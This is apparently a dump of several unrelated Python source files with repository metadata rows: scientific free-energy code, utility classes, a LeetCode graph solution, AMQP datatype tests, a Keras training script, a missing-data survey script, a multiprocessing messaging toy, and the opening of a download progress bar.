        bootstrap_df = bootstrap_one_dim_free_energy(prt, obs, bins=bins)
        df = pd.concat([msm_df, bootstrap_df])
        return df
    else:
        return msm_df
def two_dim_free_energy(prt, x_obs, y_obs, bins=None):
    """Population-weighted 2-D free energy surface for two observables.

    :param prt: protein model
    :param x_obs: dict of per-trajectory x observable values
    :param y_obs: dict of per-trajectory y observable values
    :param bins: int (number of edges for both axes, auto-ranged from the
        data), or a pair [x_edges, y_edges]
    :return: (per-state histogram dict, overall free energy 2-D array)
    """
    # Re-key the per-trajectory observables by MSM state.
    state_x_obs_dict = _map_obs_to_state(prt, x_obs)
    state_y_obs_dict = _map_obs_to_state(prt, y_obs)
    if bins is None or type(bins)==int:
        # Auto-range both axes from the raw data.
        # NOTE(review): with bins=None, np.linspace(..., None) fails —
        # callers presumably always pass an int or explicit edges; confirm.
        max_x_val = np.max(np.concatenate(list(x_obs.values())))
        min_x_val = np.min(np.concatenate(list(x_obs.values())))
        max_y_val = np.max(np.concatenate(list(y_obs.values())))
        min_y_val = np.min(np.concatenate(list(y_obs.values())))
        x_array = np.linspace(min_x_val, max_x_val, bins)
        y_array = np.linspace(min_y_val, max_y_val, bins)
    else:
        x_array = bins[0]
        y_array = bins[1]
    H, H_msm = _two_dim_histogram(prt.msm.populations_,
                                  state_x_obs_dict,
                                  state_y_obs_dict,
                                  x_array,
                                  y_array)
    return H, H_msm
| true |
acd1dc77d5f6002d103a8f8e51079d4bb5625bcb | Python | obsiwitch/edupr5melkman | /src/utils.py | UTF-8 | 905 | 3.25 | 3 | [] | no_license | import types
# Iterable SimpleNamespace.
class Table(types.SimpleNamespace):
    """SimpleNamespace whose iteration yields its attribute values."""
    def __iter__(self):
        yield from self.__dict__.values()
# Iterable keeping track of the current element.
class Iter:
    """Iteration helper that tracks the index of the current element.

    ``i`` is -1 until the first call to ``next()``; the ``j`` property
    clamps it to a valid index so the inspection helpers work before
    iteration starts.
    """
    def __init__(self, collection):
        self.collection = collection
        self.i = -1
    @property
    def j(self):
        # Clamped cursor: -1 (not started yet) is treated as position 0.
        return max(self.i, 0)
    def processed(self, reverse = False):
        """Elements up to and including the current one."""
        if reverse:
            return self.collection[self.j::-1]
        return self.collection[:self.j + 1]
    def remaining(self):
        """Elements after the current one."""
        return self.collection[self.j + 1:]
    @property
    def current(self):
        """The element at the cursor, or None for an empty collection."""
        if self.collection:
            return self.collection[self.j]
    @property
    def finished(self):
        """True once the cursor sits on the last element."""
        return self.i == len(self.collection) - 1
    def next(self):
        """Advance and return the next element, or None when exhausted."""
        if self.i + 1 >= len(self.collection):
            return None
        self.i += 1
        return self.collection[self.i]
| true |
dd68395c81b8a2678252149a3b30502382354eb2 | Python | ointaj/VNSP | /src/messages.py | UTF-8 | 285 | 2.78125 | 3 | [] | no_license |
class cErrorMessages:
    """Console error reporters used by the game code."""
    @staticmethod
    def CantOpenFile():
        # Report a failed attempt to open a file.
        print("Can't open the file !")
    @staticmethod
    def CantWriteToFile():
        # Report a failed attempt to write to a file.
        print("Can't write to file")
    @staticmethod
    def StorageError():
        # Report a failure while creating the game's storage.
        print("Error of creating storage for game !")
846363d81683de9177f333e7a478f6d019c1b01d | Python | danaimone/Blind_75 | /Graphs/course_schedule.py | UTF-8 | 1,273 | 3.40625 | 3 | [] | no_license | from typing import List
class Solution:
    """LeetCode 207 "Course Schedule": decide whether all courses can be
    completed, i.e. the prerequisite graph has no directed cycle."""

    def canFinish(self, numCourses: int, prerequisites: List[List[int]]) -> bool:
        """Build the prerequisite -> follow-up adjacency map and run a
        cycle check starting from every course."""
        from collections import defaultdict
        graph = defaultdict(list)
        for follow, prereq in ((pair[0], pair[1]) for pair in prerequisites):
            graph[prereq].append(follow)

        done = [False] * numCourses       # fully explored, cycle-free
        on_stack = [False] * numCourses   # currently on the DFS stack

        return not any(
            self.isCyclic(course, graph, done, on_stack)
            for course in range(numCourses)
        )

    def isCyclic(self, current_course, course_dict, checked, path):
        """DFS from current_course; True when the walk re-enters the active
        recursion stack (a back edge, hence a cycle)."""
        if checked[current_course]:
            # Already proven cycle-free from here.
            return False
        if path[current_course]:
            # Back edge into the current DFS path.
            return True

        path[current_course] = True
        found_cycle = False
        for neighbour in course_dict[current_course]:
            found_cycle = self.isCyclic(neighbour, course_dict, checked, path)
            if found_cycle:
                break
        path[current_course] = False
        checked[current_course] = True
        return found_cycle
3a44dc430791d348812ec58a112f23f31b5da8e8 | Python | ekimekim/grabbit | /grabbit/frames/tests/test_datatypes.py | UTF-8 | 1,832 | 2.703125 | 3 | [] | no_license |
from unittest import main
from grabbit.frames.datatypes import *
from common import FramesTestCase
class DatatypeTests(FramesTestCase):
	"""Round-trip tests for the AMQP wire datatypes.

	NOTE(review): ``self.check`` comes from FramesTestCase in common.py
	(not shown here); it presumably packs the given value(s) and compares
	against the byte string, then unpacks back — confirm there.
	"""
	def test_octet(self):
		self.check(Octet, '\xab', 0xab)
	def test_short(self):
		self.check(Short, '\xbe\xef', 0xbeef)
	def test_long(self):
		self.check(Long, '\xde\xad\xbe\xef', 0xdeadbeef)
	def test_longlong(self):
		self.check(LongLong, '\x00\x0d\xef\xac\xed\xfa\xca\xde', 0x000defacedfacade)
	def test_shortstring(self):
		# Short strings carry a one-byte length prefix.
		self.check(ShortString, '\x0bhello world', "hello world")
	def test_longstring(self):
		# Long strings carry a four-byte length prefix.
		self.check(LongString, '\x00\x00\x00\x0bhello world', "hello world")
	def test_bits(self):
		TestFlags = Bits('foo', 'bar', 'baz')
		self.check(TestFlags, '\x03', (True, True, False))
	def test_bits_big(self):
		# More than 8 flags must spill into a second byte.
		BigTestFlags = Bits('a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j')
		self.check(BigTestFlags,
		           '\x35\x02',
		           (True, False, True, False, True, True, False, False, False, True))
	def test_bits_properties(self):
		TestFlags = Bits('foo', 'bar', 'baz')
		flags = TestFlags((True, False, True))
		self.assertEquals((flags.foo, flags.bar, flags.baz), (True, False, True))
	def test_proto_header(self):
		self.check(ProtocolHeader, 'AMQP\x00\x00\x09\x01')
	def test_sequence(self):
		# Fields: (attribute name or None, datatype[, default]).
		class TestSequence(Sequence):
			fields = [
				(None, ShortString, ''),
				('one', Short),
				(None, Bits('two', 'three')),
				('four', ShortString, 'test'),
				('five', Short, 5),
			]
		obj = TestSequence(1, two=True, three=False, five=3)
		self.assertEquals(obj.one, 1)
		self.assertEquals(obj.two, True)
		self.assertEquals(obj.three, False)
		self.assertEquals(obj.four, "test")
		self.assertEquals(obj.five, 3)
		self.check(TestSequence, '\x00\x00\x01\x01\x04test\x00\x03', 1, two=True, three=False, five=3)
# Allow running this test module directly with unittest's CLI runner.
if __name__ == '__main__':
	main()
| true |
84533e99bf66f555fa73defbae8460f6c9c0e241 | Python | M2odrigo/keras_metrics | /train_normalize_data_old.py | UTF-8 | 2,932 | 3.09375 | 3 | [] | no_license | # Create your first MLP in Keras
from desviation_function import calc_metric
from keras.models import Sequential
from keras.layers import Dense
from sklearn.preprocessing import StandardScaler
import numpy as np
# fix random seed for reproducibility
# Train a small MLP on the Pima Indians diabetes dataset, then rebuild each
# layer as a standalone model to probe its activations and feed them to the
# custom per-layer deviation metric (calc_metric).
np.random.seed(7)
##variables
cant_epoch = 0
batch_size = 100
###
# load pima indians dataset
dataset = np.loadtxt("pima-indians-diabetes.csv", delimiter=",")
#normalize the data
scaler = StandardScaler()
# split into input (X) and output (Y) variables
X = dataset[:,0:8]
Y = dataset[:,8]
# normalize the values of the train set
X = scaler.fit_transform(X)
# create model: 8 inputs -> 12 -> 8 -> 1, all sigmoid
model = Sequential()
model.add(Dense(12, input_dim=8, activation='sigmoid'))
model.add(Dense(8, activation='sigmoid'))
model.add(Dense(1, activation='sigmoid'))
# Compile model
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
# Fit the model (note: cant_epoch is 0 here, so only the initial weights
# are evaluated)
model.fit(X, Y, epochs=cant_epoch, batch_size=batch_size)
# evaluate the model
scores = model.evaluate(X, Y)
print("\n%s: %.2f%%" % (model.metrics_names[1], scores[1]*100))
print(model.summary())
print("#########outputs of hidden layer 1 with 12 nodes#################")
# Clone layer 1 with the trained weights to expose its activations.
# NOTE(review): predict_proba was removed in modern Keras; predict is the
# equivalent here — confirm the installed Keras version.
model2 = Sequential()
model2.add(Dense(12, input_dim=8, weights=model.layers[0].get_weights(), activation='sigmoid'))
activations2 = model2.predict_proba(X)
#print(activations2)
a2 = np.asarray(activations2)
desviation_one = calc_metric(1, 12, a2, Y)
print("desviation_one",desviation_one)
print("desviation_class0e",desviation_one[0])
print("desviation_class1e",desviation_one[1])
#np.savetxt(str(cant_epoch) + "_epoch_hidden1.csv", h2, fmt = '%.5f', delimiter=",")
print("#########outputs of hidden layer 2 with 8 nodes#################")
# Clone layer 2; it consumes the activations of layer 1.
model3 = Sequential()
model3.add(Dense(8, input_dim=12, weights=model.layers[1].get_weights(), activation='sigmoid'))
activations3 = model3.predict_proba(activations2)
#print(activations3)
a3 = np.asarray(activations3)
desviation_two = calc_metric(2, 8, a3, Y)
print("desviation_two",desviation_two)
print("desviation_class0e",desviation_two[0])
print("desviation_class1e",desviation_two[1])
#h3 = []
#for index, w in enumerate(a3):
#    h3.append(np.append([a3[index]], [Y[index]]))
#np.savetxt(str(cant_epoch) + "_epoch_hidden2.csv", h3, fmt = '%.5f', delimiter=",")
print("#########outputs of output layer with 1 node#################")
# Clone the output layer; it consumes the activations of layer 2.
model4 = Sequential()
model4.add(Dense(1, input_dim=8, weights=model.layers[2].get_weights(), activation='sigmoid'))
activations4 = model4.predict_proba(activations3)
#print(activations4)
a4 = np.asarray(activations4)
desviation_three = calc_metric(3, 1, a4, Y)
print("desviation_three",desviation_three)
print("desviation_class0e",desviation_three[0])
print("desviation_class1e",desviation_three[1])
#h4 = []
#for index, w in enumerate(a4):
#    h4.append(np.append([a4[index]], [Y[index]]))
#np.savetxt(str(cant_epoch) + "_epoch_output.csv", h4, fmt = '%.5f', delimiter=",")
| true |
754e058181171b81cd9641cd4393c82b5e5ffa8b | Python | aiyingsuccess/machinelearning | /finalbasic.py | UTF-8 | 1,542 | 2.515625 | 3 | [] | no_license | from __future__ import print_function
from pandas import read_csv
import math
import numpy as np
import pandas as pd
import random
import matplotlib.pyplot as plt
# Survey missing data per column: for each column containing NaNs, record
# its index/name, how many rows survive when those NaNs are dropped, and
# how many distinct values the column has, then write two report files.
dataset = read_csv('/home/aiying/Machinelearning/dataorigin.csv')
headers = list(dataset)
ds=dataset.values.tolist()
modset=[]            # row lists of each NaN-dropped frame
modframe=[]          # the NaN-dropped dataframes themselves
modframelen=[]       # surviving row count per affected column
testcolumnameset=[]  # names of columns that had missing values
testcolumnset=[]     # indices of columns that had missing values
colvalues=[]         # distinct values per affected column
j=-1
for i in headers:
    j=j+1
    # Row labels where this column is NaN.
    # NOTE(review): Series.apply(np.isnan) fails on non-numeric columns —
    # confirm every column in dataorigin.csv is numeric.
    indexNames = dataset[i].index[dataset[i].apply(np.isnan)]
    if len(indexNames)==0:
        continue
    # Drop the rows missing in this column and record the result.
    newds=dataset.drop(indexNames)
    modframe.append(newds)
    lnewds=newds.values.tolist()
    modset.append(lnewds)
    modframelen.append(len(lnewds))
    testcolumnameset.append(i)
    testcolumnset.append(j)
    values=pd.unique(dataset[i])
    colvalues.append(values)
print('sum of columns have missing data', len(modset))
print('shortest column',min(modframelen))
# Report: one tab-separated line per affected column
# (index, name, surviving rows, distinct values).
i=0
with open('colmissing.'+'txt', 'w') as f:
    for item in testcolumnset:
        f.write("%s\t" % item )
        f.write("%s\t"%headers[item])
        f.write("%s\t" % modframelen[i])
        f.write("%s\n"%len(colvalues[i]))
        i=i+1
# Report: comma-separated surviving row counts only.
with open('numberofcolmissing.'+'txt', 'w') as f:
    for item in modframelen:
        f.write("%s," % item )
# i=-1
# colrefine=[]
# for item in modframelen:
#     i=i+1
#     if item<4800:
#         colrefine.append(testcolumnset[i])
# with open('colrefine.'+'txt', 'w') as f:
#     for item in colrefine:
#         f.write("%s," % item )
| true |
638ee9e488194d8d8b81d8031b952de2cdeb8742 | Python | krestenkrab/500lines | /cluster/bb_network.py | UTF-8 | 2,267 | 2.765625 | 3 | [
"CC-BY-3.0",
"MIT"
] | permissive | import logging
from multiprocessing import Process, Queue
# Remove from final copy:
# - logging
network = {}
class Node(object):
    """Endpoint in the simulated message network.

    Each node owns an inbox queue and registers it in the module-level
    ``network`` map under its address so peers can deliver messages to it.
    """
    def __init__(self, address):
        self.address = address
        self.q = Queue()
        self.logger = logging.getLogger('node.%s' % address)
        network[self.address] = self.q
    def send(self, destinations, action, **kwargs):
        """Deliver an (action, kwargs) message to every destination inbox."""
        self.logger.debug("sending %s with args %s to %s", action, kwargs, destinations)
        for destination in destinations:
            network[destination].put((action, kwargs))
class Member(Node, Process):
    """State-machine replica running in its own OS process.

    Consumes (action, kwargs) messages from its queue and dispatches them
    to ``do_<ACTION>`` handlers; a (None, None) message is the shutdown
    sentinel used by join().
    """
    def __init__(self, execute_fn, address):
        Node.__init__(self, address)
        Process.__init__(self, name=address)
        # execute_fn(state, input) -> (new_state, output)
        self.execute_fn = execute_fn
    def run(self):
        # Process main loop: block on the inbox and dispatch by action name.
        while True:
            action, kwargs = self.q.get()
            if not action:
                return
            self.logger.debug("received %r with args %r" % (action, kwargs))
            getattr(self, 'do_%s' % action)(**kwargs)
    def join(self):
        # Send the shutdown sentinel, then wait for the process to exit.
        self.q.put((None, None))
        Process.join(self)
    def start(self, initial_value=None):
        # Seed the replicated state before forking the worker process.
        self.state = initial_value
        Process.start(self)
    def invoke(self, input):
        """Run one state-machine transition and return its output."""
        self.state, output = self.execute_fn(self.state, input)
        return output
    def do_INVOKE(self, input, caller):
        # Handler for INVOKE messages: execute and reply to the caller.
        self.send([caller], 'INVOKED', output=self.invoke(input))
class Client(Node):
    """Synchronous client: sends INVOKE to a member and blocks for the reply."""
    def __init__(self, address, member_address):
        Node.__init__(self, address)
        self.member_address = member_address
    def invoke(self, input):
        """Request one invocation from the member and wait for the result."""
        self.send([self.member_address], 'INVOKE', input=input, caller=self.address)
        # Blocks until the member posts the INVOKED reply to our queue.
        action, kwargs = self.q.get()
        self.logger.debug("received %r with args %r" % (action, kwargs))
        return kwargs['output']
def sequence_generator(state, input):
    """State-machine step: given the current counter and a requested count,
    return (new counter, the range of values handed out)."""
    new_state = state + input
    return new_state, range(state, new_state)
if __name__ == "__main__":
logging.basicConfig(format="%(asctime)s %(name)s proc=%(processName)s %(message)s", level=logging.DEBUG)
member = Member(sequence_generator, address='memb1')
client = Client('client', member.address)
member.start(initial_value=0)
print client.invoke(4)
print client.invoke(1)
member.join()
| true |
a3b4d9d3bcdf79fa872469a1dac8ce96300e714e | Python | rajesh-cric/pythonchallenges.py | /code4.py | UTF-8 | 197 | 3.484375 | 3 | [] | no_license | print("***tax Program***")
price=float(input("how much did you pay?: "))
if price>=1.00:
tax=0.07
print('tax rate is:'+str(tax))
else:
tax=0
print('tax rate is:'+str(tax))
| true |
5e813ff1b146cd92d09447327f739b1cb065ddcd | Python | ekitanidis/heart4cast | /utils.py | UTF-8 | 896 | 3.34375 | 3 | [] | no_license | import numpy as np
from itertools import groupby
def find_consec(data, size):
""" Finds all groups of contiguous numbers of a given size in data. These groups may overlap.
Returns a list of tuples, where each tuple is the pair of indices in data enclosing the group.
"""
# find groups of contiguous numbers of minimum size
ipairs = []
k = 0
for key, group in groupby(enumerate(data), lambda x:x[0]-x[1]):
elems = len(list(group))
if elems >= size:
ipairs.append((k, k + elems - 1))
k+=elems
# split larger groups into multiple overlapping groups of exact size
spairs = ipairs.copy()
for i in ipairs:
if (i[1] - i[0] + 1) > size:
s = [(i[0] + j, i[0] + j + size - 1) for j in range(0, (i[1] - i[0] + 1) - size + 1, 1)]
spairs.remove(i)
spairs.extend(s)
return spairs
| true |
d0f3233f10e832c521bff393c8dac104b65552ca | Python | anaskhan96/r2ic | /src/code.py | UTF-8 | 4,740 | 2.796875 | 3 | [
"MIT"
] | permissive | class ThreeAddressCode:
    def __init__(self):
        # Symbol table shared with the parser; assigned externally before use.
        self.symbolTable = None
        # Emitted quadruples, in program order.
        self.allCode = []
        # Counter used to mint fresh temporary names (t1, t2, ...).
        self.tempVarCount = 0
        # Bookkeeping for loop-unrolling support.
        self.loop_statement_count = 0
        self.loop_status = ''
        self.loop_unroll = False
        self.loop_values = []
    def loop_begin(self):
        # Mark that subsequently emitted statements belong to a loop body.
        self.loop_status = 'begin'
    def loop_end(self):
        # Mark the end of the current loop body.
        self.loop_status = 'end'
    def generateCode(self, operation, arg1, arg2, result):
        """Append one quadruple (operation, arg1, arg2, result) to allCode."""
        code = Quadruple(operation, arg1, arg2, result)
        self.allCode.append(code)
    def print_code(self):
        """Dump the generated quadruples as a tab-aligned table."""
        print("\tOperation\tArg1\t\tArg2\t\tResult")
        for i in self.allCode:
            print("\t", i.operation, "\t\t", i.arg1, "\t\t", i.arg2, "\t\t", i.result)
    def generate_icg(self, operation, arg1, arg2, result):
        """Translate one source-level operation into three-address code.

        Performs constant folding through the symbol table where operand
        values are known, allocates temporaries for arithmetic results, and
        buffers small-range FOR loops for unrolling at 'loop-end'.  Symbol
        table rows are lists; index 2 holds the value ('~' = unknown at
        compile time).
        """
        # Count statements emitted while inside a loop body (used when unrolling).
        if self.loop_status =='begin':
            self.loop_statement_count +=1
        if operation == "goto":
            self.generateCode(operation, arg1, arg2, result)
        elif operation == 'print':
            # print lowers to a software interrupt.
            self.generateCode("SWI", '', '', result)
        elif operation.endswith("F"):
            # Conditional ("...F") operations: both operands are stringified.
            self.generateCode(operation, str(arg1), str(arg2), result)
        elif operation == "=":
            # Assignment: fold a known integer value of the RHS identifier,
            # otherwise emit the assignment symbolically.
            if type(arg1) == str:
                if arg1 in self.symbolTable.symbols.keys():
                    value = self.symbolTable.lookup(arg1)[2]
                    if type(value) == int:
                        self.generateCode(operation, value, '', result)
                        # updation of id in symbol table
                        value1 = self.symbolTable.lookup(result)
                        value1[2] = value
                        self.symbolTable.symbols[result] = value1
                    else:
                        self.generateCode(operation, arg1, '', result)
            else:
                self.generateCode(operation, arg1, '', result)
                # updation of id in symbol table
                value = self.symbolTable.lookup(result)
                value[2] = arg1
                self.symbolTable.symbols[result] = value
        elif operation in ["+", "-" , "*", "/"]:
            # operation is either +,-,*,/
            # A fresh temporary tN receives the result in every case.
            if type(arg1) == int and type(arg2) == int:
                self.tempVarCount += 1
                temp = 't'+str(self.tempVarCount)
                self.symbolTable.insert(temp, [0, 'ID', result, "global", "-"])
            else:
                self.tempVarCount += 1
                temp = 't'+str(self.tempVarCount)
                if type(arg1) == str and type(arg2) == int:
                    # identifier OP constant: fold if the identifier's value is known.
                    val = self.symbolTable.lookup(arg1)[2]
                    if val != '~':
                        res = 0
                        if operation == '+':
                            res = val + arg2
                        elif operation == '-':
                            res = val - arg2
                        elif operation == '*':
                            res = val * arg2
                        elif operation == '/':
                            res = val / arg2
                        self.symbolTable.insert(temp, [0, 'ID', res, "global", "-"])
                    else:
                        self.generateCode(operation, arg1, arg2, temp)
                        self.symbolTable.insert(temp, [0, 'ID', '~', "global", "-"])
                elif type(arg1) == int and type(arg2) == str:
                    # constant OP identifier: symmetric folding case.
                    val = self.symbolTable.lookup(arg2)[2]
                    if val != '~':
                        res = 0
                        if operation == '+':
                            res = arg1 + val
                        elif operation == '-':
                            res = arg1 - val
                        elif operation == '*':
                            res = arg1 * val
                        elif operation == '/':
                            res = arg1 / val
                        self.symbolTable.insert(temp, [0, 'ID', res, "global", "-"])
                    else:
                        self.generateCode(operation, arg1, arg2, temp)
                        self.symbolTable.insert(temp, [0, 'ID', '~', "global", "-"])
                else:
                    # Both operands symbolic: emit the operation unfolded.
                    self.generateCode(operation, arg1, arg2, temp)
                    self.symbolTable.insert(temp, [0, 'ID', '~', "global", "-"])
        elif operation == 'FOR':
            # Loops spanning more than 10 iterations are emitted as real loops;
            # smaller ones are flagged for unrolling.
            if (int(arg2) - int(arg1) > 10 ):
                self.generateCode(operation, arg1, arg2, result)
            else:
                self.loop_values.append(int(arg1))
                self.loop_values.append(int(arg2))
                self.loop_unroll = True
        elif operation == 'loop-end' and self.loop_unroll:
            # Unroll: pop the buffered loop-body statements and re-append them
            # once per iteration; arithmetic/assignment ops are deduplicated.
            # NOTE(review): state is reset inside the iteration loop and `temp`
            # accumulates across iterations — confirm this ordering is intended.
            op =[]
            temp = []
            for i in range(self.loop_statement_count -1):
                op.append(self.allCode.pop())
            for i in range(self.loop_values[0], self.loop_values[1]):
                for j in op[::-1]:
                    if(j.operation not in ['=','-','+', '*','/']):
                        self.allCode.append(j)
                    else:
                        if j not in temp:
                            temp.append(j)
            self.allCode += (temp)
            self.loop_values = []
            self.loop_status = ''
            self.loop_unroll = False
    def putLabel(self, kind):
        """Resolve a pending label placeholder against the current code length.

        Placeholders end in "S"; the next instruction index is appended to
        them.  kind 'result' / 'arg1' patches the most recent placeholder in
        that field; any other kind emits a back-edge goto to the instruction
        preceding the placeholder.
        """
        label = len(self.allCode)
        if kind == 'result':
            # Patch the most recently emitted pending result label.
            for i in reversed(self.allCode):
                if i.result.endswith("S"):
                    i.result += str(label)
                    break
        elif kind == 'arg1':
            # Patch the most recently emitted pending arg1 label.
            for i in reversed(self.allCode):
                if i.arg1.endswith("S"):
                    i.arg1 += str(label)
                    break
        else:
            # Emit a goto back to the instruction just before the pending label.
            allCodeReverse = self.allCode[::-1]
            for i in range(len(allCodeReverse)):
                if allCodeReverse[i].result.endswith("S"):
                    self.generate_icg("goto", "S"+str(label-i-1), '', '')
                    break
def getLatestTemp(self):
return 't'+str(self.tempVarCount)
class Quadruple:
    """A single three-address-code instruction: (operation, arg1, arg2, result)."""

    def __init__(self, operation, arg1, arg2, result):
        # Store the four instruction fields verbatim.
        self.operation, self.arg1, self.arg2, self.result = (
            operation, arg1, arg2, result)

    def print_quadruple(self):
        # One-line, space-separated dump of the instruction.
        print(self.operation, self.arg1, self.arg2, self.result)
| true |
5562e79062f81e96d531adc685df17684b4d3428 | Python | athro/openSNPAnalysis | /python_scripts/compress.py | UTF-8 | 1,905 | 2.640625 | 3 | [
"MIT"
] | permissive | import gzip
import zipfile
import os
#AK:TBD:# xls unfinished and untested
#AK:TBD:import xlrd
# Magic-byte signatures used to sniff compression format from a file's header.
magic = {}
magic["zip"] = b'\x50\x4b\x03\x04'
magic["gzip"] = b'\x1f\x8b\x08'
#magic["bzip"] = b'\x42\x5a\x68'
#AK:TBD:magic["xls"] = b'\xd0\xcf'
#AK:TBD:# change to filehanle for zipped xls?
#AK:TBD:def test_xsl(filename):
#AK:TBD: with open(filename, 'rb') as f:
#AK:TBD: buffer = f.read(1024)
#AK:TBD: return_val = False
#AK:TBD: if buffer.startswith(magic["xls"]):
#AK:TBD: return_val = True
#AK:TBD: return return_val
#AK:TBD:# Idea: open xls, convert it to temp. csv, return filehandle for csv
#AK:TBD:def open_xls(filename):
#AK:TBD: wb = xlrd.open_workbook(filename_temp)
#AK:TBD: ws = wb.sheets()[0]
#AK:TBD: temp_csv_file_name = get_temp_csv_file_name
#AK:TBD: temp_csv_file = open(temp_csv_file_name, 'wb')
#AK:TBD: wr = csv.writer(temp_csv_file, quoting=csv.QUOTE_ALL)
#AK:TBD: for rownum in xrange(ws.nrows):
#AK:TBD: wr.writerow(ws.row_values(rownum))
#AK:TBD: temp_csv_file.close()
def open_zip(filename):
    """Open a zip archive and return a file handle on its first member."""
    archive = zipfile.ZipFile(filename)
    first_member = archive.namelist()[0]
    return archive.open(first_member)
def open_gzip(filename):
    """Return a GzipFile handle that transparently decompresses *filename*."""
    return gzip.GzipFile(filename)
def compress_open(filename):
    """Open *filename*, transparently decompressing recognized formats.

    The first bytes are compared against the module-level `magic` signatures;
    a match dispatches to the matching opener in `get_fh`, otherwise the file
    is opened as plain text.
    """
    with open(filename, 'rb') as probe:
        header = probe.read(1024)
    for fmt, signature in magic.items():
        if header.startswith(signature):
            return get_fh[fmt](filename)
    return open(filename)
# Dispatch table mapping a sniffed format name to the matching opener.
get_fh = {}
get_fh["zip"] = open_zip
get_fh["gzip"] = open_gzip
#AK:TBD:get_fh["xls"] = open_xls
get_fh["plain"] = open
if __name__ == "__main__":
    # Smoke test: try to open every genotype file with transparent decompression.
    directory = '../../data/genotypes/'
    files = os.listdir(directory)
    for filename in files:
        try:
            cf = compress_open(directory+"/"+filename)
        except Exception:
            # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
            # still abort the scan instead of being reported as bad files.
            print("Can't uncompress "+filename)
| true |
8ed3d20034fa3b76446d18df2fb4d1537805116d | Python | NeuralVFX/wasserstein-gan | /util/helpers.py | UTF-8 | 2,278 | 2.703125 | 3 | [] | no_license | import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
import torch
import torch.nn as nn
from torch.utils.data import *
############################################################################
# Helper Utilities
############################################################################
def mft(tensor):
    """Return the mean of *tensor* as a scalar FloatTensor."""
    return torch.FloatTensor(tensor).mean()
def weights_init_normal(m):
    """Initialize a layer's weights from N(0, 0.02).

    Intended for use with ``model.apply(weights_init_normal)``.  Conv2d,
    Linear and ConvTranspose-style layers are initialized; everything else
    is left untouched.
    """
    classname = m.__class__.__name__
    if 'ConvTrans' == classname:
        # Exact-name match never fires for real layer names such as
        # 'ConvTranspose2d'. NOTE(review): presumably meant to skip transposed
        # convs, but the elif below still matches them — confirm intent.
        pass
    elif 'Conv2d' in classname or 'Linear' in classname or 'ConvTrans' in classname:
        # Fix: nn.init.normal was deprecated and later removed; use the
        # in-place variant nn.init.normal_ (identical behavior).
        nn.init.normal_(m.weight.data, 0, .02)
def new_random_z(bs, z, seed=False):
    """Return a (bs, z, 1, 1) tensor of normally distributed N(0, 1) noise.

    If *seed* is truthy the global torch RNG is seeded first for
    reproducibility (note: a seed of 0 is skipped because 0 is falsy).
    Fix: the original unconditionally called .cuda(), crashing on CPU-only
    machines; the tensor is now placed on CUDA only when it is available.
    """
    if seed:
        torch.manual_seed(seed)
    device = 'cuda' if torch.cuda.is_available() else 'cpu'
    z = torch.FloatTensor(bs, z, 1, 1).normal_(0, 1).to(device)
    return z
class BatchFeeder:
    # Abstracting the fetching of batches from the data loader
    def refresh(self):
        # Re-create the iterator over the loader and reset the batch counter.
        self.data_iter = iter(self.train_loader)
        self.batch_len = len(self.train_loader)
        self.data_iter_count = 0
    def __init__(self, dataloader):
        self.train_loader = dataloader
        self.original_len = len(self.train_loader)
        self.refresh()
    def get_new(self):
        # Return the current iterator (not the next batch) and bump the counter.
        # NOTE(review): the guard looks inverted — it refreshes while the
        # counter is still BELOW batch_len, i.e. on almost every call; confirm
        # whether `>=` (refresh only once exhausted) was intended.
        if self.data_iter_count < self.batch_len:
            self.refresh()
        batch = self.data_iter
        self.data_iter_count += 1
        return batch
############################################################################
# Display Images
############################################################################
def show_test(gen, z, denorm, save=False):
    # Generate samples from z vector, show and also save
    # gen: generator network; z: latent noise batch (at least 16 samples,
    # since a 4x4 grid is drawn); denorm: object whose .denorm() maps a
    # generated tensor back to a displayable image.  If `save` is a path,
    # the figure is written there before being shown.
    gen.eval()
    results = gen(z)
    gen.train()
    fig, axes = plt.subplots(4, 4, figsize=(10, 10))
    for i, ax in enumerate(axes.flat):
        ax.imshow(denorm.denorm(results[i]))
    if save:
        # savefig runs before plt.show(), so the rendered grid is preserved.
        plt.savefig(save)
    plt.show()
    plt.close(fig)
def show_samples(results, denorm):
    # Show samples, used to show raw samples from dataset
    # results: at least 16 image tensors; denorm: object whose .denorm()
    # maps a tensor back to a displayable image.
    fig, axes = plt.subplots(4, 4, figsize=(10, 10))
    for i, ax in enumerate(axes.flat):
        ax.imshow(denorm.denorm(results[i]))
    plt.show()
    plt.close(fig)
| true |
7fa8b9fd51cdcc523cc10f8ada9db4ea42d8fd9e | Python | danielpeterson0530/Code | /Python/Functions/gzipfile2dict.py | UTF-8 | 411 | 3.109375 | 3 | [] | no_license | # Python Function to gunzip file and return dictionary (requires gzip package)
def gzipfile2dict(filename):
# requires gzip package
gzip_dict = {}
with gzip.open(filename, mode='rt') as f:
for line in f:
elements = line.strip().split('\t')
label = elements[0]
id = elements[4]
gzip_dict[label] = str(gzip_dict.get(label, "")) + str(id) + "\t"
return gzip_dict
| true |
4ce7709e03ecea50f48d79e17c98449668a904c2 | Python | As4klat/Tutorial_Python | /Tanda 1/07.py | UTF-8 | 579 | 4.03125 | 4 | [] | no_license | compr = True
while compr:
    # Keep prompting until the user supplies a valid integer count m.
    try:
        m = int(input("Introduzca número factoriales a calcular: "))
        compr = False
    except ValueError:
        print("Introduzca solo valores numéricos enteros\n")
for i in range(1, m+1):
    # For each of the m rounds, re-prompt until a valid integer n is entered,
    # then compute n! iteratively.
    compr = True
    while compr:
        try:
            n = int(input("Introduzca un número para calcular su factorial: "))
            compr = False
        except ValueError:
            print("Introduzca solo valores numéricos enteros\n")
    factorial = 1
    for j in range(2, n+1):
        factorial *= j
    # Print: round number, the input n, and n!.
    print(i, n, factorial)
51975ed36b591ef25e3d7235d79d68bd3e5fbca3 | Python | cloverrose/pythonz | /pythonz/downloader.py | UTF-8 | 1,840 | 2.890625 | 3 | [
"MIT"
] | permissive |
import urllib
import urllib2
import sys
from pythonz.exceptions import DownloadError
class ProgressBar(object):
    """Render a simple in-place terminal progress bar (79 columns wide)."""

    def __init__(self, out=sys.stdout):
        # Five columns are reserved for the trailing " NNN%" percentage field.
        self._term_width = 79
        self._out = out

    def update_line(self, current):
        """Return the bar string for *current* percent, ending in '\\r'."""
        width = self._term_width - 5
        filled = int(current / 100.0 * width)
        line = u'#' * filled + u' ' * (width - filled)
